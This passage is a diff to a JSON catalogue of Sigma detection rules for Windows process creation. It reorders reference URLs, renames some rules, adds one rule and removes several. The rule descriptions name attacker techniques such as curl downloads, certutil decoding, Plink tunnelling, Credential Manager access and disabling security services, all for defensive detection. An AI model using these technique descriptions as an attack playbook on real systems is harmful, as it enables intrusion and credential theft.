- "type": "related-to"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18",
- "value": "Potential Emotet Activity"
- },
{
"description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
"meta": {
@@ -62227,10 +59727,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt",
"https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464",
- "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/",
+ "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt",
"https://twitter.com/max_mal_/status/1542461200797163522",
+ "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml"
],
"tags": [
@@ -62324,41 +59824,6 @@
"uuid": "730fc21b-eaff-474b-ad23-90fd265d4988",
"value": "Psexec Execution"
},
- {
- "description": "Detects a specific command used by the Conti ransomware group",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/10/12",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_conti_ransomware_commands.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
- "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_ransomware_commands.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.s0575",
- "attack.t1486"
- ]
- },
- "related": [
- {
- "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "689308fc-cfba-4f72-9897-796c1dc61487",
- "value": "Potential Conti Ransomware Activity"
- },
{
"description": "Detects suspicious process related to rasdial.exe",
"meta": {
@@ -62406,8 +59871,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
"https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"
],
"tags": [
@@ -62441,9 +59906,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.intrinsec.com/apt27-analysis/",
"https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://www.intrinsec.com/apt27-analysis/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml"
],
"tags": [
@@ -62547,27 +60012,6 @@
"uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86",
"value": "UAC Bypass Using DismHost"
},
- {
- "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/04/12",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "53207cc2-0745-4c19-bc72-80be1cc16b3f",
- "value": "Potential CVE-2023-21554 QueueJumper Exploitation"
- },
{
"description": "Detects suspicious Plink tunnel port forwarding to a local port",
"meta": {
@@ -62581,8 +60025,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d",
"https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/",
+ "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml"
],
"tags": [
@@ -62656,9 +60100,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5",
"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/",
"https://lolbas-project.github.io/lolbas/Binaries/Verclsid/",
- "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml"
],
"tags": [
@@ -62727,8 +60171,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1",
"https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md",
+ "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml"
],
"tags": [
@@ -62795,9 +60239,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1511415432888131586",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/",
"https://twitter.com/mrd0x/status/1511489821247684615",
+ "https://twitter.com/mrd0x/status/1511415432888131586",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml"
],
"tags": [
@@ -62860,8 +60304,8 @@
"logsource.product": "windows",
"refs": [
"https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/frack113/status/1555830623633375232",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/frack113/status/1555830623633375232",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml"
],
"tags": [
@@ -62895,9 +60339,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn",
- "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml"
],
"tags": [
@@ -63030,8 +60474,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml"
],
"tags": [
@@ -63122,12 +60566,12 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
+ "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
- "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil",
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://twitter.com/JohnLaTwC/status/835149808817991680",
- "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil",
+ "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"
],
"tags": [
@@ -63160,10 +60604,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
- "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
"https://twitter.com/Cyb3rWard0g/status/1453123054243024897",
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://github.com/antonioCoco/RogueWinRM",
+ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml"
],
"tags": [
@@ -63183,67 +60627,6 @@
"uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d",
"value": "Suspicious Child Process Created as System"
},
- {
- "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/07/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_revil_kaseya.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
- "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers",
- "https://www.joesandbox.com/analysis/443736/0/html",
- "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
- "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059",
- "attack.g0115"
- ]
- },
- "related": [
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5",
- "value": "REvil Kaseya Incident Malware Patterns"
- },
- {
- "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/10/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml"
- ],
- "tags": [
- "attack.execution"
- ]
- },
- "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a",
- "value": "Potential Raspberry Robin Dot Ending File"
- },
{
"description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.",
"meta": {
@@ -63319,8 +60702,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
"http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html",
+ "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
"https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml"
],
@@ -63564,7 +60947,7 @@
"value": "Windows Credential Manager Access via VaultCmd"
},
{
- "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection",
+ "description": "Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.",
"meta": {
"author": "FPT.EagleEye Team, wagga",
"creation_date": "2020/12/11",
@@ -63601,7 +60984,7 @@
}
],
"uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445",
- "value": "Suspicious Shells Spawn by SQL Server"
+ "value": "Suspicious Child Process Of SQL Server"
},
{
"description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL",
@@ -63795,8 +61178,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://learn.microsoft.com/en-us/windows/package-manager/winget/source",
+ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml"
],
"tags": [
@@ -63864,8 +61247,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html",
"https://github.com/fireeye/DueDLLigence",
+ "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html",
"https://lolbas-project.github.io/lolbas/Binaries/Rasautou/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml"
],
@@ -63932,8 +61315,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
"https://twitter.com/pabraeken/status/993497996179492864",
+ "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml"
],
"tags": [
@@ -64163,8 +61546,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md",
"https://github.com/OTRF/detection-hackathon-apt29/issues/6",
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml"
],
"tags": [
@@ -64255,8 +61638,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/986280382042595328",
"https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html",
+ "https://twitter.com/mattifestation/status/986280382042595328",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"
],
"tags": [
@@ -64332,7 +61715,7 @@
}
],
"uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc",
- "value": "Suspicious Invoke-WebRequest Usage"
+ "value": "Suspicious Invoke-WebRequest Execution"
},
{
"description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)",
@@ -64381,8 +61764,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/",
"https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml"
],
"tags": [
@@ -64439,10 +61822,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/JohnLaTwC/status/1415295021041979392",
"https://vms.drweb.fr/virus/?i=24144899",
- "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1",
"https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
+ "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1",
+ "https://twitter.com/JohnLaTwC/status/1415295021041979392",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml"
],
"tags": [
@@ -64475,8 +61858,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf",
"https://sourceforge.net/projects/mouselock/",
+ "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml"
],
"tags": [
@@ -64510,8 +61893,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml"
],
"tags": [
@@ -64565,56 +61948,6 @@
"uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d",
"value": "Download Arbitrary Files Via MSOHTMED.EXE"
},
- {
- "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2018/02/22",
- "falsepositive": [
- "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)"
- ],
- "filename": "proc_creation_win_exploit_cve_2017_0261.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1203",
- "attack.t1204.002",
- "attack.initial_access",
- "attack.t1566.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833",
- "value": "Exploit for CVE-2017-0261"
- },
{
"description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline",
"meta": {
@@ -64629,9 +61962,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
"https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml"
],
"tags": [
@@ -64655,9 +61988,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf",
"https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html",
"https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors",
+ "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml"
],
"tags": [
@@ -64782,7 +62115,7 @@
{
"description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.",
"meta": {
- "author": "Timur Zinniatullin, oscd.community",
+ "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel",
"creation_date": "2019/10/21",
"falsepositive": [
"WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.",
@@ -64896,8 +62229,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
"https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html",
+ "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml"
],
"tags": [
@@ -65004,6 +62337,49 @@
"uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35",
"value": "Suspicious Obfuscated PowerShell Code"
},
+ {
+ "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence",
+ "meta": {
+ "author": "Swachchhanda Shrawan Poudel, Elastic (idea)",
+ "creation_date": "2023/04/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-",
+ "https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1036.005",
+ "attack.t1053.005"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c",
+ "value": "Suspicious Scheduled Task Creation via Masqueraded XML File"
+ },
{
"description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.",
"meta": {
@@ -65017,10 +62393,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
"https://twitter.com/Alh4zr3d/status/1580925761996828672",
"https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml"
],
"tags": [
@@ -65042,40 +62418,6 @@
"uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0",
"value": "Service DACL Abuse To Hide Services Via Sc.EXE"
},
- {
- "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2018/02/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2015_1641.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/",
- "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef",
- "value": "Exploit for CVE-2015-1641"
- },
{
"description": "Detects a suspicious execution from an uncommon folder",
"meta": {
@@ -65090,9 +62432,9 @@
"logsource.product": "windows",
"refs": [
"https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md",
+ "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
"https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt",
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
- "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml"
],
"tags": [
@@ -65125,8 +62467,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf",
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
+ "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml"
],
"tags": [
@@ -65225,8 +62567,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
"https://twitter.com/bopin2020/status/1366400799199272960",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml"
],
"tags": [
@@ -65287,40 +62629,6 @@
"uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b",
"value": "RunDLL32 Spawning Explorer"
},
- {
